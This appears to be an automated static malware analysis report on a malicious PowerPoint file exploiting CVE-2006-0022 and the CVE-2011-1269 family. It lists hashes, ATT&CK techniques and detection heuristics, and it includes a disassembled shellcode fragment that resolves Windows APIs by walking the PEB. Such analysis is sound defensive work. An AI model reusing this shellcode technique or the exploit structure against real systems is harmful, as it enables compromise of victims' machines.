Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f7d7dbc5d423261…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 116.5 KB · First seen: 2015-10-01
MD5: d23a9610029dd465be06e9c8eb25d960
SHA-1: 247d08f57f23fc72a75b1fdcd0835810a507e6e9
SHA-256: 2f7d7dbc5d4232615531e20badaea10fb204f1393156c7250e62af17b725a2d6
Risk Score: 320

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1055 Process Injection

Critical heuristics indicate that the sample exploits PowerPoint vulnerabilities (CVE-2006-0022 and the CVE-2011-1269 / MS11-036 family). It carries a binary-format RCE payload, likely delivered via process injection, and exhibits NOP-sled and heap-spray characteristics. XOR-encoded strings suggest obfuscation of the malicious code.

Heuristics (7)

  • CVE-2006-0022 — PowerPoint malformed TextHeaderAtom [critical · CVE · exact match: CVE_2006_0022]
    The PowerPoint Document stream contains a malformed TextHeaderAtom whose textType is outside the valid range. This is the OffVis-compatible structural trigger for the MS06-028 PowerPoint malformed-record vulnerability.
  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family [critical · CVE · likely · PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD]
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • XOR-encoded strings (key 0x81) [critical · SC_XOR_ENCODED]
    Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x81: 'LoadLibraryA', 'GetProcAddress'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 95% of instructions — a sled or padding/filler run, not program logic).
  • PEB access via FS segment (x86) [high · SC_PEB_ACCESS]
    Shellcode reads the Process Environment Block through the FS segment (fs:[0x30]), a position-independent way to locate loaded modules without fixed addresses.
    Disassembly
    x86 disassembly · validity: code (1.0) — 2/2 branch targets land on an instruction boundary (100% coherence)
    000006D0  64a130000000      mov eax, dword ptr fs:[0x30]
    000006D6  8b400c            mov eax, dword ptr [eax + 0xc]
    000006D9  8b701c            mov esi, dword ptr [eax + 0x1c]
    000006DC  ad                lodsd eax, dword ptr [esi]
    000006DD  8b7008            mov esi, dword ptr [eax + 8]
    000006E0  e907020000        jmp 0x8ec
    000006E5  58                pop eax
    000006E6  81ec00020000      sub esp, 0x200
    000006EC  8bfc              mov edi, esp
    000006EE  8b18              mov ebx, dword ptr [eax]
    000006F0  895f04            mov dword ptr [edi + 4], ebx
    000006F3  897708            mov dword ptr [edi + 8], esi
    000006F6  83c004            add eax, 4
    000006F9  89470c            mov dword ptr [edi + 0xc], eax
    000006FC  57                push edi
    000006FD  56                push esi
    000006FE  68ad9b7ddf        push 0xdf7d9bad
    00000703  e890010000        call 0x898
    00000708  8bf0              mov esi, eax
    0000070A  33ff              xor edi, edi
    0000070C  6a00              push 0
    0000070E  57                push edi
    0000070F  ffd6              call esi
    00000711  3d00d20100        cmp eax, 0x1d200
    00000716  7403              je 0x71b
    00000718  47                inc edi
    00000719  ebf1              jmp 0x70c
    0000071B  8bc7              mov eax, edi
    0000071D  5f                pop edi
    0000071E  894710            mov dword ptr [edi + 0x10], eax
    00000721  ff7708            push dword ptr [edi + 8]
    00000724  68ec97030c        push 0xc0397ec
    00000729  e86a010000        call 0x898
    0000072E  89                .byte 0x89
    0000072F  47                inc edi
  • PEB API-hash resolver [high · SC_API_HASH_RESOLVER]
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly: identical to the listing shown under SC_PEB_ACCESS above (same bytes at 000006D0–0000072F).
  • Heap-spray pattern detected [high · SC_HEAP_SPRAY]
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
  • NOP-equivalent sled detected [medium · SC_NOP_EQUIV_SLED]
    Long run of 0x41 bytes
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).